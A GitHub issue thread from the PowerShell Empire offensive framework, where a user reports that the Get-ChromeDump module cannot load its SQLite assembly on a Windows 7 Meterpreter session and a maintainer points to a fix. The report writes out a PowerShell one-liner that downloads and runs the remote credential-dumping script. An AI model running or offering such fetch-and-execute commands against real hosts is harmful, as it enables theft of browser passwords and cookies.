### ISSUE TITLE
Get-ChromeDump Sqlite assembly issue

### ISSUE THREAD

**Issue by DanelMalsky** [PowerShellEmpire/Empire#241]
## Empire Version
1.5.0

## OS Information (Linux flavor, Python version)
ubuntu 14.04
python 2.7

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

 from cmd.exe

`powershell "IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellEmpire/Empire/raw/master/data/module_source/collection/Get-ChromeDump.ps1'); Get-ChromeDump`

Every time I run Get-ChromeDump I get error

`WARNING: [!]Unable to load SQLite assembly`

## Screenshot of error, embedded text output, or Pastebin link to the error
sysinfo
Computer        : ********-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : ********
Logged On Users : 2
Meterpreter     : x64/win64

## Any additional information

Here's log

Log when I tried to Add assembly manually

Could not load file or assembly 'System.Data.SQLite, Version=1.0.98.0, Culture=neutral, PublicKeyToken=db937bc2d44ff139' or one of its dependencies. The application has failed to start because its side-by-side configuration is incorrect. Please see the application event log or use the command-line sxstrace.exe tool for more detail. (Exception from HRESULT: 0x800736B1)

**Comment by enigma0x3** [comment]
Hey @DanelMalsky,
I pushed a fix to the dev branch. If you do a pull on that branch (or replace your local copy of Get-ChromeDump.ps1 with the one from the dev branch), it should be fixed. The commit is here: https://github.com/PowerShellEmpire/Empire/commit/9df8e9bf03b8da316a1e997f46721f60ce9dba05

Feel free to re-comment on this if the fix doesn't do it for you. I was able to reproduce the error I have tested the fix on both Windows 7 and Windows 10 without error.

Thanks!
